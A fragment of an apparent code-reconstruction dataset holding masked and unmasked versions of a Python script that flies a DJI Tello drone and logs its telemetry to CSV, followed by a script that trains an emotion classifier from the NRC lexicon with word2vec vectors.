item[15],\n item[17], item[19], item[21], item[23], item[25], item[27],\n item[29], item[31]]\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n def stop(self):\n self.tello.end()\n\n def run(self):\n self.tello.connect()\n self.tello.takeoff()\n tempo1 = self.tello.get_flight_time()\n tempo1 = tempo1[0:len(tempo1) - 1]\n bateria = self.tello.get_battery()\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n print('Nivel da bateria é: {}'.format(str(bateria)))\n print('Tempo de início foi {}'.format(str(tempo1)))\n print('Tempo de término foi de {}'.format(str(tempo2)))\n while int(tempo2) - int(tempo1) < 10:\n print('Nivel da bateria é: ' + str(bateria))\n self.__array.append(self.tello.get_attitude())\n self.__data.append(self.tello.get_states())\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n self.tello.land()\n self.tello.end()\n print(self.__array)\n print(self.__data)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass DataTello:\n\n def __init__(self):\n self.tello = Tello()\n self.__data = []\n self.__array = []\n self.tempoVoo = 420000\n \"\"\"\n ___Padrão para nome dos arquivos das tabelas___\n Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo\n \n 1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv\n 2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv\n 3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv\n \"\"\"\n self.nomeArquivo = '2_tudoFechado_420'\n self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',\n 'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',\n 'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])\n \"\"\"\n self.__startCollector = False\n self.__endProgram = False\n threadCollector = threading.Thread(target=self.dataCollector, args=())\n threadCollector.daemon = False\n threadCollector.start()\n\n def dataCollector(self):\n while True:\n if self.__startCollector:\n self.__data.append(self.tello.get_states())\n\n if self.__endProgram:\n for item in self.__data:\n timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7], \n item[9], item[11], item[13], item[15], item[17], item[19], \n item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame\n\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n break \n \"\"\"\n\n def fly(self):\n self.tello.connect()\n self.tello.takeoff()\n timestampInicial = int(round(time.time() * 1000))\n timestampFinal = timestampInicial\n while timestampFinal - timestampInicial < self.tempoVoo:\n try:\n timestampFinal = int(round(time.time() * 1000))\n self.__data.append(self.tello.get_states())\n if not len(self.__data) % 20 == 0:\n self.tello.send_command_without_return('command')\n except KeyboardInterrupt:\n print('\\n . . .\\n')\n self.tello.end()\n break\n self.tello.land()\n self.tello.end()\n for item in self.__data:\n timestamp = int(round(time.time() * 1000))\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],\n item[5], item[7], item[9], item[11], item[13], item[15],\n item[17], item[19], item[21], item[23], item[25], item[27],\n item[29], item[31]]\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n def stop(self):\n self.tello.end()\n\n def run(self):\n self.tello.connect()\n self.tello.takeoff()\n tempo1 = self.tello.get_flight_time()\n tempo1 = tempo1[0:len(tempo1) - 1]\n bateria = self.tello.get_battery()\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n print('Nivel da bateria é: {}'.format(str(bateria)))\n print('Tempo de início foi {}'.format(str(tempo1)))\n print('Tempo de término foi de {}'.format(str(tempo2)))\n while int(tempo2) - int(tempo1) < 10:\n print('Nivel da bateria é: ' + str(bateria))\n self.__array.append(self.tello.get_attitude())\n self.__data.append(self.tello.get_states())\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n self.tello.land()\n self.tello.end()\n print(self.__array)\n print(self.__data)\n\n\ndef main():\n dataTello = DataTello()\n dataTello.fly()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass DataTello:\n\n def __init__(self):\n self.tello = Tello()\n self.__data = []\n self.__array = []\n self.tempoVoo = 420000\n \"\"\"\n ___Padrão para nome dos arquivos das tabelas___\n Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo\n \n 1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv\n 2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv\n 3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv\n \"\"\"\n self.nomeArquivo = '2_tudoFechado_420'\n self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',\n 'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',\n 'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])\n \"\"\"\n self.__startCollector = False\n self.__endProgram = False\n threadCollector = threading.Thread(target=self.dataCollector, args=())\n threadCollector.daemon = False\n threadCollector.start()\n\n def dataCollector(self):\n while True:\n if self.__startCollector:\n self.__data.append(self.tello.get_states())\n\n if self.__endProgram:\n for item in self.__data:\n timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7], \n item[9], item[11], item[13], item[15], item[17], item[19], \n item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame\n\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n break \n \"\"\"\n\n def fly(self):\n self.tello.connect()\n self.tello.takeoff()\n timestampInicial = int(round(time.time() * 1000))\n timestampFinal = timestampInicial\n while timestampFinal - timestampInicial < self.tempoVoo:\n try:\n timestampFinal = int(round(time.time() * 1000))\n self.__data.append(self.tello.get_states())\n if not len(self.__data) % 20 == 0:\n self.tello.send_command_without_return('command')\n except KeyboardInterrupt:\n print('\\n . . .\\n')\n self.tello.end()\n break\n self.tello.land()\n self.tello.end()\n for item in self.__data:\n timestamp = int(round(time.time() * 1000))\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],\n item[5], item[7], item[9], item[11], item[13], item[15],\n item[17], item[19], item[21], item[23], item[25], item[27],\n item[29], item[31]]\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n def stop(self):\n self.tello.end()\n\n def run(self):\n self.tello.connect()\n self.tello.takeoff()\n tempo1 = self.tello.get_flight_time()\n tempo1 = tempo1[0:len(tempo1) - 1]\n bateria = self.tello.get_battery()\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n print('Nivel da bateria é: {}'.format(str(bateria)))\n print('Tempo de início foi {}'.format(str(tempo1)))\n print('Tempo de término foi de {}'.format(str(tempo2)))\n while int(tempo2) - int(tempo1) < 10:\n print('Nivel da bateria é: ' + str(bateria))\n self.__array.append(self.tello.get_attitude())\n self.__data.append(self.tello.get_states())\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n self.tello.land()\n self.tello.end()\n print(self.__array)\n print(self.__data)\n\n\ndef main():\n dataTello = DataTello()\n dataTello.fly()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from djitellopy import Tello\nimport time\nimport threading\nimport pandas as pd\n\n\nclass DataTello:\n\n def __init__(self):\n self.tello = Tello()\n self.__data = []\n self.__array = []\n self.tempoVoo = 420000\n \"\"\"\n ___Padrão para nome dos arquivos das tabelas___\n Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo\n \n 1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv\n 2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv\n 3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv\n \"\"\"\n self.nomeArquivo = '2_tudoFechado_420'\n self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll',\n 'yaw', 'vgx', 'vgy', 'vgz', 'templ', 'temph', 'tof', 'height',\n 'battery', 'barometer', 'time', 'agx', 'agy', 'agz'])\n \"\"\"\n self.__startCollector = False\n self.__endProgram = False\n threadCollector = threading.Thread(target=self.dataCollector, args=())\n threadCollector.daemon = False\n threadCollector.start()\n\n def dataCollector(self):\n while True:\n if self.__startCollector:\n self.__data.append(self.tello.get_states())\n\n if self.__endProgram:\n for item in self.__data:\n timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7], \n item[9], item[11], item[13], item[15], item[17], item[19], \n item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame\n\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n break \n \"\"\"\n\n def fly(self):\n self.tello.connect()\n self.tello.takeoff()\n timestampInicial = int(round(time.time() * 1000))\n timestampFinal = timestampInicial\n while timestampFinal - timestampInicial < self.tempoVoo:\n try:\n timestampFinal = int(round(time.time() * 1000))\n self.__data.append(self.tello.get_states())\n if not len(self.__data) % 20 == 0:\n self.tello.send_command_without_return('command')\n except KeyboardInterrupt:\n print('\\n . . .\\n')\n self.tello.end()\n break\n self.tello.land()\n self.tello.end()\n for item in self.__data:\n timestamp = int(round(time.time() * 1000))\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3],\n item[5], item[7], item[9], item[11], item[13], item[15],\n item[17], item[19], item[21], item[23], item[25], item[27],\n item[29], item[31]]\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n def stop(self):\n self.tello.end()\n\n def run(self):\n self.tello.connect()\n self.tello.takeoff()\n tempo1 = self.tello.get_flight_time()\n tempo1 = tempo1[0:len(tempo1) - 1]\n bateria = self.tello.get_battery()\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n print('Nivel da bateria é: {}'.format(str(bateria)))\n print('Tempo de início foi {}'.format(str(tempo1)))\n print('Tempo de término foi de {}'.format(str(tempo2)))\n while int(tempo2) - int(tempo1) < 10:\n print('Nivel da bateria é: ' + str(bateria))\n self.__array.append(self.tello.get_attitude())\n self.__data.append(self.tello.get_states())\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:len(tempo2) - 1]\n self.tello.land()\n self.tello.end()\n print(self.__array)\n print(self.__data)\n\n\ndef main():\n dataTello = DataTello()\n dataTello.fly()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from djitellopy import Tello\nimport time\nimport threading\nimport pandas as pd\n\nclass DataTello:\n \n def __init__(self):\n # Inicia objeto de controle do Tello\n self.tello = Tello()\n \n # Array onde será armazenado a lista de dados coletado pelo Tello\n self.__data = []\n self.__array = []\n\n # Tempo de voo em mili segundos\n self.tempoVoo = 420000\n\n '''\n ___Padrão para nome dos arquivos das tabelas___\n Onde x é o nº da tabela e y a quantidade de tempo em segundos do voo\n \n 1. Para a janela fechada e porta fechada: x_tudoFechado_y.csv\n 2. Para a janela aberta e porta aberta: x_janelaPortaAberta_y.csv\n 3. Para a janela e porta aberta, com ventilador ligado na direção do drone: x_janelaPortaAbertaVentilador_y.csv\n '''\n\n # Padrão de nome\n self.nomeArquivo = '2_tudoFechado_420'\n self.__df = pd.DataFrame(columns=['timestamp', 'pitch', 'roll', \n 'yaw', 'vgx', 'vgy', 'vgz', \n 'templ', 'temph', 'tof', \n 'height', 'battery', 'barometer', \n 'time', 'agx', 'agy', 'agz'])\n '''\n self.__startCollector = False\n self.__endProgram = False\n threadCollector = threading.Thread(target=self.dataCollector, args=())\n threadCollector.daemon = False\n threadCollector.start()\n\n def dataCollector(self):\n while True:\n if self.__startCollector:\n self.__data.append(self.tello.get_states())\n\n if self.__endProgram:\n for item in self.__data:\n timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7], \n item[9], item[11], item[13], item[15], item[17], item[19], \n item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame\n\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n break \n ''' \n\n def fly(self):\n #\n self.tello.connect()\n self.tello.takeoff()\n timestampInicial = int(round(time.time() * 1000))\n timestampFinal = timestampInicial\n\n while ((timestampFinal - timestampInicial) < self.tempoVoo):\n try:\n timestampFinal = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados\n self.__data.append(self.tello.get_states())\n if (not len(self.__data) % 20 == 0):\n self.tello.send_command_without_return('command')\n except KeyboardInterrupt:\n print ('\\n . . 
.\\n')\n self.tello.end() \n break\n\n self.tello.land()\n self.tello.end()\n\n for item in self.__data:\n timestamp = int(round(time.time() * 1000)) # Cria timestamp no momento que recebe os dados\n self.__df.loc[len(self.__df)] = [timestamp, item[1], item[3], item[5], item[7], \n item[9], item[11], item[13], item[15], item[17], item[19], \n item[21], item[23], item[25], item[27], item[29], item[31]] # Adiciona os novos valores em uma nova linha do DataFrame\n\n self.__df.to_csv('{}.csv'.format(self.nomeArquivo))\n\n def stop(self):\n self.tello.end()\n\n \n\n def run(self):\n self.tello.connect()\n self.tello.takeoff()\n tempo1 = self.tello.get_flight_time()\n tempo1 = tempo1[0:(len(tempo1)-1)]\n #time.sleep(3)\n bateria = self.tello.get_battery()\n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:(len(tempo2)-1)]\n \n print('Nivel da bateria é: {}'.format(str(bateria)))\n \n print('Tempo de início foi {}'.format(str(tempo1)))\n print('Tempo de término foi de {}'.format(str(tempo2)))\n \n while ((int(tempo2) - int(tempo1)) < 10):\n print('Nivel da bateria é: ' + str(bateria))\n self.__array.append(self.tello.get_attitude())\n self.__data.append(self.tello.get_states()) \n tempo2 = self.tello.get_flight_time()\n tempo2 = tempo2[0:(len(tempo2)-1)]\n\n self.tello.land()\n self.tello.end()\n print(self.__array)\n print(self.__data)\n\n\ndef main():\n dataTello = DataTello()\n dataTello.fly()\n #dataTello.stop()\n\nif __name__ == \"__main__\":\n main() ",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
# coding: utf-8
"""Supporting model logic for predicting emotional content of user input.
"""
import pandas as pd
import gensim
from sklearn.model_selection import train_test_split
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import LinearSVC
#load data for emo2vec
loc = 'https://s3-us-west-1.amazonaws.com/victorsdatasets/NRCEmotionLexiconv092AnnotatorandSenseLevel.txt'
print("loading & cleaning the data...")
em_words = pd.read_csv(loc, sep='\t', names=['annotator_id',
'remove',
'word',
'joy',
'sadness',
'fear',
'anger',
'trust',
'disgust',
'surprise',
'anticipation',
'POS'])
em_words.drop('remove', axis=1, inplace=True)
em_words['word'], em_words['synonym'] = em_words['word'].str.split('--').str
em_words['toss1'], em_words['joy'] = em_words['joy'].str.split('-').str
em_words['toss2'], em_words['sadness'] = em_words['sadness'].str.split('-').str
em_words['toss3'], em_words['fear'] = em_words['fear'].str.split('-').str
em_words['toss4'], em_words['anger'] = em_words['anger'].str.split('-').str
em_words['toss5'], em_words['trust'] = em_words['trust'].str.split('-').str
em_words['toss6'], em_words['disgust'] = em_words['disgust'].str.split('-').str
em_words['toss7'], em_words['surprise'] = em_words['surprise'].str.split('-').str
em_words['toss8'], em_words['anticipation'] = em_words['anticipation'].str.split('-').str
em_words['toss9'], em_words['POS'] = em_words['POS'].str.split('-').str
em_words.drop(['toss1','toss2','toss3','toss4','toss5','toss6','toss7','toss8','toss9'],
axis=1,
inplace=True)
new_cols = ['annotator_id',
'word','synonym',
'joy',
'sadness',
'fear',
'anger',
'trust',
'disgust',
'surprise',
'anticipation',
'POS']
em_words = em_words.reindex_axis(new_cols, axis=1)
emotions = em_words[['joy',
'sadness',
'fear',
'anger',
'trust',
'disgust',
'surprise',
'anticipation']]
em_words[emotions.columns] = em_words[emotions.columns].apply(pd.to_numeric)
affected = em_words[emotions.columns].groupby([em_words['word']], sort=False).mean().reset_index()
# Load Google's pre-trained Word2Vec model.
print('training the word2vec model from google\'s corpus')
model = gensim.models.Word2Vec.load_word2vec_format('../GoogleNews-vectors-negative300.bin', binary=True)
# create list of word indicies to drop to avoid keyerrors with Google's pre-trained model.
idx_to_drop = []
def dropper():
for ex in affected['word']:
if ex not in model.vocab:
idx_to_drop.append(affected.loc[affected.word == ex].index[0])
# drop words from affected that are not in google's model
dropper()
affected = affected.drop(idx_to_drop, axis=0)
G_vectors = lambda x: model[x]
affected['word_vectors'] = affected['word'].apply(G_vectors)
affected['label_vectors'] = affected[emotions.columns].values.tolist()
affected['binary'] = (affected[emotions.columns] > 0).astype(int).values.tolist()
df1 = affected[emotions.columns].rank(method='max', axis=1).rank(method='first', axis=1)
ma = df1.max().max()
affected['label'] = (df1== ma).astype(int).values.tolist()
affected['target'] = affected['label'].apply(lambda x: x.index(1))
label_dict = {0 : 'joy',
1 : 'sadness',
2 : 'fear',
3 : 'anger',
4 : 'trust',
5 : 'disgust',
6 : 'surprise',
7 : 'anticipation'}
affected['label_name'] = affected['target'].apply(lambda x: label_dict[x])
emo2vec = affected[['word_vectors', 'label_vectors', 'binary', 'label', 'target', 'label_name']]
# # Model Testing
print("splitting into train/test groups...")
emo_X, emo_y = list(emo2vec.word_vectors), list(emo2vec.target)
emo_X_train, emo_X_test, emo_y_train, emo_y_test = train_test_split(emo_X, emo_y, random_state=42)
# ### OnevsRest with LinearSVC (best score)
print("creating a model with the best stuff we've got...")
OVR = OneVsRestClassifier(LinearSVC(random_state=0), n_jobs=-1)
emo_model = OVR.fit(emo_X_train, emo_y_train)
|
normal
|
{
"blob_id": "f5f26819be4b98fab3d46e57e1a5431e54342aed",
"index": 414,
"step-1": "<mask token>\n\n\ndef dropper():\n for ex in affected['word']:\n if ex not in model.vocab:\n idx_to_drop.append(affected.loc[affected.word == ex].index[0])\n\n\n<mask token>\n",
"step-2": "<mask token>\nprint('loading & cleaning the data...')\n<mask token>\nem_words.drop('remove', axis=1, inplace=True)\n<mask token>\nem_words.drop(['toss1', 'toss2', 'toss3', 'toss4', 'toss5', 'toss6',\n 'toss7', 'toss8', 'toss9'], axis=1, inplace=True)\n<mask token>\nprint(\"training the word2vec model from google's corpus\")\n<mask token>\n\n\ndef dropper():\n for ex in affected['word']:\n if ex not in model.vocab:\n idx_to_drop.append(affected.loc[affected.word == ex].index[0])\n\n\ndropper()\n<mask token>\nprint('splitting into train/test groups...')\n<mask token>\nprint(\"creating a model with the best stuff we've got...\")\n<mask token>\n",
"step-3": "<mask token>\nloc = (\n 'https://s3-us-west-1.amazonaws.com/victorsdatasets/NRCEmotionLexiconv092AnnotatorandSenseLevel.txt'\n )\nprint('loading & cleaning the data...')\nem_words = pd.read_csv(loc, sep='\\t', names=['annotator_id', 'remove',\n 'word', 'joy', 'sadness', 'fear', 'anger', 'trust', 'disgust',\n 'surprise', 'anticipation', 'POS'])\nem_words.drop('remove', axis=1, inplace=True)\nem_words['word'], em_words['synonym'] = em_words['word'].str.split('--').str\nem_words['toss1'], em_words['joy'] = em_words['joy'].str.split('-').str\nem_words['toss2'], em_words['sadness'] = em_words['sadness'].str.split('-').str\nem_words['toss3'], em_words['fear'] = em_words['fear'].str.split('-').str\nem_words['toss4'], em_words['anger'] = em_words['anger'].str.split('-').str\nem_words['toss5'], em_words['trust'] = em_words['trust'].str.split('-').str\nem_words['toss6'], em_words['disgust'] = em_words['disgust'].str.split('-').str\nem_words['toss7'], em_words['surprise'] = em_words['surprise'].str.split('-'\n ).str\nem_words['toss8'], em_words['anticipation'] = em_words['anticipation'\n ].str.split('-').str\nem_words['toss9'], em_words['POS'] = em_words['POS'].str.split('-').str\nem_words.drop(['toss1', 'toss2', 'toss3', 'toss4', 'toss5', 'toss6',\n 'toss7', 'toss8', 'toss9'], axis=1, inplace=True)\nnew_cols = ['annotator_id', 'word', 'synonym', 'joy', 'sadness', 'fear',\n 'anger', 'trust', 'disgust', 'surprise', 'anticipation', 'POS']\nem_words = em_words.reindex_axis(new_cols, axis=1)\nemotions = em_words[['joy', 'sadness', 'fear', 'anger', 'trust', 'disgust',\n 'surprise', 'anticipation']]\nem_words[emotions.columns] = em_words[emotions.columns].apply(pd.to_numeric)\naffected = em_words[emotions.columns].groupby([em_words['word']], sort=False\n ).mean().reset_index()\nprint(\"training the word2vec model from google's corpus\")\nmodel = gensim.models.Word2Vec.load_word2vec_format(\n '../GoogleNews-vectors-negative300.bin', binary=True)\nidx_to_drop = []\n\n\ndef dropper():\n for ex in affected['word']:\n if ex not in model.vocab:\n idx_to_drop.append(affected.loc[affected.word == ex].index[0])\n\n\ndropper()\naffected = affected.drop(idx_to_drop, axis=0)\nG_vectors = lambda x: model[x]\naffected['word_vectors'] = affected['word'].apply(G_vectors)\naffected['label_vectors'] = affected[emotions.columns].values.tolist()\naffected['binary'] = (affected[emotions.columns] > 0).astype(int\n ).values.tolist()\ndf1 = affected[emotions.columns].rank(method='max', axis=1).rank(method=\n 'first', axis=1)\nma = df1.max().max()\naffected['label'] = (df1 == ma).astype(int).values.tolist()\naffected['target'] = affected['label'].apply(lambda x: x.index(1))\nlabel_dict = {(0): 'joy', (1): 'sadness', (2): 'fear', (3): 'anger', (4):\n 'trust', (5): 'disgust', (6): 'surprise', (7): 'anticipation'}\naffected['label_name'] = affected['target'].apply(lambda x: label_dict[x])\nemo2vec = affected[['word_vectors', 'label_vectors', 'binary', 'label',\n 'target', 'label_name']]\nprint('splitting into train/test groups...')\nemo_X, emo_y = list(emo2vec.word_vectors), list(emo2vec.target)\nemo_X_train, emo_X_test, emo_y_train, emo_y_test = train_test_split(emo_X,\n emo_y, random_state=42)\nprint(\"creating a model with the best stuff we've got...\")\nOVR = OneVsRestClassifier(LinearSVC(random_state=0), n_jobs=-1)\nemo_model = OVR.fit(emo_X_train, emo_y_train)\n",
"step-4": "<mask token>\nimport pandas as pd\nimport gensim\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.svm import LinearSVC\nloc = (\n 'https://s3-us-west-1.amazonaws.com/victorsdatasets/NRCEmotionLexiconv092AnnotatorandSenseLevel.txt'\n )\nprint('loading & cleaning the data...')\nem_words = pd.read_csv(loc, sep='\\t', names=['annotator_id', 'remove',\n 'word', 'joy', 'sadness', 'fear', 'anger', 'trust', 'disgust',\n 'surprise', 'anticipation', 'POS'])\nem_words.drop('remove', axis=1, inplace=True)\nem_words['word'], em_words['synonym'] = em_words['word'].str.split('--').str\nem_words['toss1'], em_words['joy'] = em_words['joy'].str.split('-').str\nem_words['toss2'], em_words['sadness'] = em_words['sadness'].str.split('-').str\nem_words['toss3'], em_words['fear'] = em_words['fear'].str.split('-').str\nem_words['toss4'], em_words['anger'] = em_words['anger'].str.split('-').str\nem_words['toss5'], em_words['trust'] = em_words['trust'].str.split('-').str\nem_words['toss6'], em_words['disgust'] = em_words['disgust'].str.split('-').str\nem_words['toss7'], em_words['surprise'] = em_words['surprise'].str.split('-'\n ).str\nem_words['toss8'], em_words['anticipation'] = em_words['anticipation'\n ].str.split('-').str\nem_words['toss9'], em_words['POS'] = em_words['POS'].str.split('-').str\nem_words.drop(['toss1', 'toss2', 'toss3', 'toss4', 'toss5', 'toss6',\n 'toss7', 'toss8', 'toss9'], axis=1, inplace=True)\nnew_cols = ['annotator_id', 'word', 'synonym', 'joy', 'sadness', 'fear',\n 'anger', 'trust', 'disgust', 'surprise', 'anticipation', 'POS']\nem_words = em_words.reindex_axis(new_cols, axis=1)\nemotions = em_words[['joy', 'sadness', 'fear', 'anger', 'trust', 'disgust',\n 'surprise', 'anticipation']]\nem_words[emotions.columns] = em_words[emotions.columns].apply(pd.to_numeric)\naffected = em_words[emotions.columns].groupby([em_words['word']], sort=False\n ).mean().reset_index()\nprint(\"training the word2vec model from google's corpus\")\nmodel = gensim.models.Word2Vec.load_word2vec_format(\n '../GoogleNews-vectors-negative300.bin', binary=True)\nidx_to_drop = []\n\n\ndef dropper():\n for ex in affected['word']:\n if ex not in model.vocab:\n idx_to_drop.append(affected.loc[affected.word == ex].index[0])\n\n\ndropper()\naffected = affected.drop(idx_to_drop, axis=0)\nG_vectors = lambda x: model[x]\naffected['word_vectors'] = affected['word'].apply(G_vectors)\naffected['label_vectors'] = affected[emotions.columns].values.tolist()\naffected['binary'] = (affected[emotions.columns] > 0).astype(int\n ).values.tolist()\ndf1 = affected[emotions.columns].rank(method='max', axis=1).rank(method=\n 'first', axis=1)\nma = df1.max().max()\naffected['label'] = (df1 == ma).astype(int).values.tolist()\naffected['target'] = affected['label'].apply(lambda x: x.index(1))\nlabel_dict = {(0): 'joy', (1): 'sadness', (2): 'fear', (3): 'anger', (4):\n 'trust', (5): 'disgust', (6): 'surprise', (7): 'anticipation'}\naffected['label_name'] = affected['target'].apply(lambda x: label_dict[x])\nemo2vec = affected[['word_vectors', 'label_vectors', 'binary', 'label',\n 'target', 'label_name']]\nprint('splitting into train/test groups...')\nemo_X, emo_y = list(emo2vec.word_vectors), list(emo2vec.target)\nemo_X_train, emo_X_test, emo_y_train, emo_y_test = train_test_split(emo_X,\n emo_y, random_state=42)\nprint(\"creating a model with the best stuff we've got...\")\nOVR = OneVsRestClassifier(LinearSVC(random_state=0), n_jobs=-1)\nemo_model = 
OVR.fit(emo_X_train, emo_y_train)\n",
"step-5": "\n# coding: utf-8\n\"\"\"Supporting model logic for predicting emotional content of user input.\n\"\"\"\nimport pandas as pd\nimport gensim\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.svm import LinearSVC\n\n#load data for emo2vec\nloc = 'https://s3-us-west-1.amazonaws.com/victorsdatasets/NRCEmotionLexiconv092AnnotatorandSenseLevel.txt'\nprint(\"loading & cleaning the data...\")\nem_words = pd.read_csv(loc, sep='\\t', names=['annotator_id',\n 'remove',\n 'word',\n 'joy',\n 'sadness',\n 'fear',\n 'anger',\n 'trust',\n 'disgust',\n 'surprise',\n 'anticipation',\n 'POS'])\n\nem_words.drop('remove', axis=1, inplace=True)\n\nem_words['word'], em_words['synonym'] = em_words['word'].str.split('--').str\n\nem_words['toss1'], em_words['joy'] = em_words['joy'].str.split('-').str\nem_words['toss2'], em_words['sadness'] = em_words['sadness'].str.split('-').str\nem_words['toss3'], em_words['fear'] = em_words['fear'].str.split('-').str\nem_words['toss4'], em_words['anger'] = em_words['anger'].str.split('-').str\nem_words['toss5'], em_words['trust'] = em_words['trust'].str.split('-').str\nem_words['toss6'], em_words['disgust'] = em_words['disgust'].str.split('-').str\nem_words['toss7'], em_words['surprise'] = em_words['surprise'].str.split('-').str\nem_words['toss8'], em_words['anticipation'] = em_words['anticipation'].str.split('-').str\nem_words['toss9'], em_words['POS'] = em_words['POS'].str.split('-').str\n\nem_words.drop(['toss1','toss2','toss3','toss4','toss5','toss6','toss7','toss8','toss9'],\n axis=1,\n inplace=True)\n\nnew_cols = ['annotator_id',\n 'word','synonym',\n 'joy',\n 'sadness',\n 'fear',\n 'anger',\n 'trust',\n 'disgust',\n 'surprise',\n 'anticipation',\n 'POS']\nem_words = em_words.reindex_axis(new_cols, axis=1)\n\nemotions = em_words[['joy',\n 'sadness',\n 'fear',\n 'anger',\n 'trust',\n 'disgust',\n 'surprise',\n 'anticipation']]\n\nem_words[emotions.columns] = em_words[emotions.columns].apply(pd.to_numeric)\n\naffected = em_words[emotions.columns].groupby([em_words['word']], sort=False).mean().reset_index()\n\n# Load Google's pre-trained Word2Vec model.\nprint('training the word2vec model from google\\'s corpus')\nmodel = gensim.models.Word2Vec.load_word2vec_format('../GoogleNews-vectors-negative300.bin', binary=True)\n\n# create list of word indicies to drop to avoid keyerrors with Google's pre-trained model.\nidx_to_drop = []\ndef dropper():\n for ex in affected['word']:\n if ex not in model.vocab:\n idx_to_drop.append(affected.loc[affected.word == ex].index[0])\n\n# drop words from affected that are not in google's model\ndropper()\naffected = affected.drop(idx_to_drop, axis=0)\n\nG_vectors = lambda x: model[x]\naffected['word_vectors'] = affected['word'].apply(G_vectors)\n\naffected['label_vectors'] = affected[emotions.columns].values.tolist()\n\naffected['binary'] = (affected[emotions.columns] > 0).astype(int).values.tolist()\n\ndf1 = affected[emotions.columns].rank(method='max', axis=1).rank(method='first', axis=1)\nma = df1.max().max()\naffected['label'] = (df1== ma).astype(int).values.tolist()\naffected['target'] = affected['label'].apply(lambda x: x.index(1))\nlabel_dict = {0 : 'joy',\n 1 : 'sadness',\n 2 : 'fear',\n 3 : 'anger',\n 4 : 'trust',\n 5 : 'disgust',\n 6 : 'surprise',\n 7 : 'anticipation'}\n\naffected['label_name'] = affected['target'].apply(lambda x: label_dict[x])\n\nemo2vec = affected[['word_vectors', 'label_vectors', 'binary', 'label', 'target', 'label_name']]\n\n# # Model 
Testing\nprint(\"splitting into train/test groups...\")\nemo_X, emo_y = list(emo2vec.word_vectors), list(emo2vec.target)\nemo_X_train, emo_X_test, emo_y_train, emo_y_test = train_test_split(emo_X, emo_y, random_state=42)\n\n\n# ### OnevsRest with LinearSVC (best score)\n\nprint(\"creating a model with the best stuff we've got...\")\nOVR = OneVsRestClassifier(LinearSVC(random_state=0), n_jobs=-1)\nemo_model = OVR.fit(emo_X_train, emo_y_train)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
trade_bot.start(sleep=1)
print('Done!')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
